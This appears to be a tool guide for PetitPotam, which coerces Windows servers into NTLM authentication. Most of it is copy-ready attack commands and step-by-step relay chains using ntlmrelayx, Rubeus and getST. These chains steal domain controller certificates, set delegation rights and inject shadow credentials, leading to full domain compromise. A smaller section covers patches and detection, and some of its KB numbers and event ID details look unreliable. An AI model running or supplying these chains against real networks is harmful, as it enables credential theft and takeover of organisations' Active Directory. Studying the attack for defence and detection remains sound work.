PetitPotam
PetitPotam is a Python exploit that abuses the Windows EFS RPC (Encrypting File System Remote Procedure Call) to coerce NTLM authentication from domain controllers and servers. By forcing targets to authenticate to an attacker-controlled relay server, it enables attacks on Active Directory Certificate Services (AD CS), resource-based constrained delegation (RBCD), and shadow credentials for domain compromise.
Installation
Section titled “Installation”Clone the PetitPotam repository and install dependencies:
git clone https://github.com/topotam/PetitPotam.git
cd PetitPotam
pip3 install impacketEnsure Python 3 and Impacket are installed on your system. Impacket provides the required DCERPC protocol implementation.
pip3 install impacket --upgrade
python3 --versionQuick Start
Section titled “Quick Start”Basic unauthenticated trigger against a target:
python3 PetitPotam.py ATTACKER_IP TARGET_IPWith authentication credentials:
python3 PetitPotam.py -u username -p password -d domain ATTACKER_IP TARGET_IPWith NTLM hash (pass-the-hash):
python3 PetitPotam.py -hashes LM_HASH:NT_HASH ATTACKER_IP TARGET_IPHow It Works
Section titled “How It Works”PetitPotam exploits the MS-EFSRPC (Encrypting File System Remote Procedure Call) protocol, specifically the EfsRpcOpenFileRaw function. This RPC function is designed for managing encrypted files and is called without proper authentication checks on many Windows systems.
The exploit works in three steps:
- Coercion: PetitPotam sends a malicious RPC request to the target system claiming it needs to open an encrypted file on a UNC path controlled by the attacker.
- NTLM Fallback: The target system attempts to authenticate to the attacker’s UNC path using NTLM, sending authentication credentials in the form of NTLM hash exchanges.
- Relay: An attacker-controlled relay server (typically
ntlmrelayxfrom Impacket) captures the NTLM authentication and relays it to a downstream service like AD CS, LDAP, or another target.
The vulnerability is particularly dangerous because:
- No valid credentials are required to trigger the coercion (in most unpatched systems)
- Domain controllers and high-privilege servers often respond to these requests
- NTLM relay bypasses many modern authentication mechanisms
Authentication Options
Section titled “Authentication Options”Unauthenticated Attack
Section titled “Unauthenticated Attack”Works against most unpatched systems:
python3 PetitPotam.py 192.168.1.100 192.168.1.10No credentials required. The target is coerced without authentication.
Authenticated Attack
Section titled “Authenticated Attack”Useful when unauthenticated triggers fail or are blocked:
python3 PetitPotam.py -u Administrator -p P@ssw0rd -d CORP 192.168.1.100 192.168.1.10Specify domain, username, and password. More likely to succeed through firewall filters.
Pass-the-Hash (PTH)
Section titled “Pass-the-Hash (PTH)”Relay using captured NTLM hashes without cleartext passwords:
python3 PetitPotam.py -hashes aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99 192.168.1.100 192.168.1.10Format: LM_HASH:NT_HASH. The LM hash is often aad3b435b51404eeaad3b435b51404ee.
EFS RPC Methods
Section titled “EFS RPC Methods”PetitPotam supports multiple RPC pipes to increase compatibility:
# Target specific pipe (all, efsr, lsarpc, netlogon, samr, spoolss)
python3 PetitPotam.py -pipe all 192.168.1.100 192.168.1.10
python3 PetitPotam.py -pipe efsr 192.168.1.100 192.168.1.10
python3 PetitPotam.py -pipe lsarpc 192.168.1.100 192.168.1.10Different pipes may succeed depending on target configuration and patches applied. Try multiple pipes if the default fails.
Attack Chain: AD CS Relay
Section titled “Attack Chain: AD CS Relay”Combine PetitPotam with ntlmrelayx to relay domain controller authentication to Active Directory Certificate Services for certificate theft.
Step 1: Set up ntlmrelayx listener targeting AD CS web enrollment
ntlmrelayx.py -t https://pki.corp.local/certsrv/certfnsh.asp -template DomainController --save-outputThis captures NTLM authentication and relays it to AD CS, requesting a certificate for the domain controller account.
Step 2: Trigger PetitPotam against the domain controller
python3 PetitPotam.py 192.168.1.100 192.168.1.10Coerce the DC to authenticate to the ntlmrelayx listener.
Step 3: Relay authentication and obtain certificate
ntlmrelayx receives the DC’s authentication and relays it to AD CS. The certificate is automatically saved (typically as a PEM file).
Step 4: Extract and use the certificate
# Convert PEM certificate to PFX for use with Rubeus
openssl pkcs12 -export -in cert.pem -inkey key.pem -out cert.pfx -passout pass:passwordStep 5: Authenticate as the domain controller
Use Rubeus or other tools to authenticate with the stolen certificate:
Rubeus.exe asktgt /user:DC$ /certificate:cert.pfx /password:password /outfile:dc.kirbiThis grants a TGT as the domain controller, leading to full domain compromise.
Attack Chain: RBCD
Section titled “Attack Chain: RBCD”Relay authentication to LDAP to set Resource-Based Constrained Delegation (RBCD) on a computer object.
Step 1: Set up ntlmrelayx targeting LDAP
ntlmrelayx.py -t ldap://dc.corp.local --delegate-accessThis configures ntlmrelayx to add delegation rights to the captured computer account.
Step 2: Trigger PetitPotam against a server
python3 PetitPotam.py 192.168.1.100 192.168.1.11Coerce a high-privilege server (e.g., file server, Exchange) to authenticate.
Step 3: Obtain delegation rights
ntlmrelayx modifies the target’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute, granting delegation rights.
Step 4: Perform service impersonation
Use the delegated rights to request a TGS as a high-privilege user (e.g., domain admin):
getST.py -spn cifs/fileserver.corp.local corp\\$ -impersonate AdministratorAttack Chain: Shadow Credentials
Section titled “Attack Chain: Shadow Credentials”Relay authentication to LDAP to inject shadow credentials (msDS-KeyCredentialLink) on computer or user objects.
Step 1: Set up ntlmrelayx with shadow credentials mode
ntlmrelayx.py -t ldap://dc.corp.local --shadow-credentials --shadow-target 'CN=DC$,OU=Computers,DC=corp,DC=local'This sets up credential injection on the specified object.
Step 2: Trigger PetitPotam
python3 PetitPotam.py 192.168.1.100 192.168.1.10Step 3: Shadow credentials injected
ntlmrelayx injects a KeyCredential into the target’s msDS-KeyCredentialLink attribute. A credential file is generated for later use.
Step 4: Authenticate using shadow credentials
Rubeus.exe asktgt /user:DC$ /certificate:shadowcred.pem /password:passwordThis grants a TGT using the injected credential without needing the original password or certificate.
Unauthenticated vs Authenticated
Section titled “Unauthenticated vs Authenticated”| Feature | Unauthenticated | Authenticated |
|---|---|---|
| Requirements | None | Username, password, or hash |
| Success Rate | High on unpatched systems | Higher through filters |
| Blocked By | MS patches, RPC filters | Additional hardening |
| CVE | CVE-2021-36942 | Same vulnerability |
| When to Use | Default attempt | If unauthenticated fails |
CVE-2021-36942: The underlying vulnerability exploited by PetitPotam. Microsoft released patches in August 2021 and subsequent updates, but many organizations remain vulnerable.
Patch Status:
- Windows Server 2016+: Patches available but not all systems updated
- Extended Protection for Authentication (EPA): Mitigates some variants
- RPC null session restrictions: Limits scope in some environments
Mitigation & Detection
Section titled “Mitigation & Detection”Patching & Prevention
Section titled “Patching & Prevention”-
Apply Windows patches: Install the August 2021 patch and subsequent critical updates
Windows Server 2016: KB5004289 Windows Server 2019: KB5004296 Windows Server 2022: KB5004289 -
Enable Extended Protection for Authentication (EPA)
- Affects LDAP and HTTP relay capabilities
- Configure on domain controllers and AD CS servers
-
RPC Null Session Restrictions
- Disable null RPC sessions on domain controllers
- Configure Registry:
HKLM\System\CurrentControlSet\Services\LanManServer\Parameters\NullSessionPipes
-
Network segmentation
- Restrict DCOM/RPC access between servers
- Block unnecessary RPC endpoints on domain controllers
Detection & Monitoring
Section titled “Detection & Monitoring”Monitor for exploitation attempts:
| Event ID | Description |
|---|---|
| 5140 | Network share accessed (monitor for suspicious UNC paths) |
| 5145 | Share object accessed (EFS-related access patterns) |
| 4624 | Logon event with unusual source IP (NTLM relay indicator) |
| 4771 | Kerberos pre-authentication failed (post-relay activity) |
| 4768 | Kerberos TGT requested (post-exploitation indicator) |
| 305 | NTLM auth to non-DC (potential relay to AD CS) |
Splunk Query Example
Section titled “Splunk Query Example”index=windows EventCode=5140 object_path="*efsrpc*" OR object_path="*certmgr*"
| stats count by src_ip, destMonitor for NTLM relay patterns targeting AD CS enrollment endpoints.
Troubleshooting
Section titled “Troubleshooting”| Issue | Solution |
|---|---|
| Connection refused | Verify target IP/port, check firewall, ensure RPC service running |
| RPC bind failed | Try different pipe (-pipe efsr, -pipe lsarpc), target may be patched |
| Authentication failed | Verify credentials, use -d domain flag, try -hashes for PTH |
| Relay not triggered | Ensure ntlmrelayx is running and listening before triggering PetitPotam |
| Certificate not issued | Check AD CS web enrollment permissions, verify template exists |
| No NTLM response | Target may have EPA enabled or null sessions restricted |
Best Practices
Section titled “Best Practices”-
Always use ntlmrelayx in relay mode: Never trigger PetitPotam without an active relay listener. Authentication will fail without a relay target.
-
Test with low-risk targets first: Validate your setup against non-critical servers before targeting domain controllers.
-
Monitor relay success: Check ntlmrelayx output for
[*] Authenticating...and successful relay messages. -
Clean up: Remove injected credentials and delegations after testing. Clean up shadow credentials from msDS-KeyCredentialLink attributes.
-
Use pass-the-hash when possible: Avoid cleartext passwords in command-line arguments. Capture NTLM hashes and use
-hashes. -
Document target configuration: Note which RPC pipes work for each target. Some systems respond to
-pipe efsrbut not-pipe all. -
Lab testing: Test exploitation chains in a controlled lab environment before attempting in production.
Related Tools
Section titled “Related Tools”| Tool | Purpose |
|---|---|
| ntlmrelayx | Impacket relay server for capturing and relaying NTLM auth |
| Coercer | Alternative coercion tool supporting multiple RPC methods (PrinterBug, DfsCoerce, etc.) |
| Certipy | AD CS enumeration and exploitation tool, works with relayed certificates |
| Rubeus | Kerberos interaction tool for requesting TGTs and TGSs with certificates |
| Responder | LLMNR/mDNS responder for capturing credentials (complements relay attacks) |
| PrinterBug | Similar coercion technique exploiting printer RPC service |
| crackmapexec | Post-exploitation framework for testing relay success |
| ldapsearch | LDAP query tool for verifying shadow credential injection |